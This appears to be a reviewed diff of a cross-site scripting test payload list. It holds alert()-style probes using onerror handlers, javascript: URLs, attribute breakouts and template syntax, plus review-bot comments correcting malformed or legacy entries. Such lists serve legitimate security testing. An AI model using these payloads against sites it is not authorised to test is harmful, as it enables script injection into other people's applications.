<img src="x" onerror="alert(String.fromCharCode(88,83,83))">
<img/src="x"/onerror=alert(1)>
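Review bot: Two of the added Basic XSS entries are not valid JavaScript and can never fire, which turns them into false negatives when the list is replayed: `<script>alert(/XSS")</script>` opens a regex literal and closes with a string quote (the well-formed `alert(/XSS/)` is already the next line), and the inline entry `')alert(1);//` has no statement separator after the closing parenthesis. `<img src=""javascript:alert('XSS');"">` is likewise malformed, since `src` is empty and the remainder parses as a junk attribute. The `<img src=javascript:...>` family only executed in very old browsers; because the file is dated 2020-2025, mark those as legacy so a clean result is not mistaken for a fixed application. `alert("hellox worldss")` adds nothing over the entries above it and can go.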
@@ -44,6 +59,7 @@
# JavaScript protocol
<a href="javascript:alert('XSS')">click</a>
<iframe src="javascript:alert('XSS')">
<iframe 00="" src="&Tab;javascript:prompt(1)&Tab;">
<object data="javascript:alert('XSS')">
# DOM-based XSS
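Review bot: The added `<iframe 00="" src="&Tab;javascript:prompt(1)&Tab;">` line is the only entry in this block with no comment on what it tests, whereas the rest of the file uses `#` headings to state intent; add a short heading such as `# Entity-encoded whitespace around javascript: URL` so readers and filter authors know that a hit means the application decodes `&Tab;` and ignores the junk `00=""` attribute before applying its URL check.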
@@ -66,12 +82,17 @@ jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</
# Attribute-based XSS
"><script>alert(1)</script>
"><script>alert("XSS")</script>
'><script>alert(1)</script>
"><img src=x onerror=alert(1)>
'><img src=x onerror=alert(1)>
"&gt;<script>alert("XSS")</script>
# Template injection XSS
{{alert(1)}}
${alert(1)}
<%= alert(1) %>
{alert(1)}
# SVG/HTML nesting XSS
<svg></svg></iframe>
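Review bot: The "Template injection XSS" block mixes client-side and server-side template syntaxes under one heading: `{{alert(1)}}` and `${alert(1)}` are client-side template probes, while `<%= alert(1) %>` is ERB/EJS server-side syntax in which `alert` is undefined, so an error page rather than a popup is the expected signal; split the heading or annotate which engine each line targets. In the Attribute-based block, `"&gt;<script>alert("XSS")</script>` only closes the attribute if the application HTML-decodes input before reflecting it, a different precondition from its siblings that deserves a comment. The `<svg></svg></iframe>` entry is a breakout fragment with no payload of its own; label it as a prefix to combine with another entry rather than a standalone test.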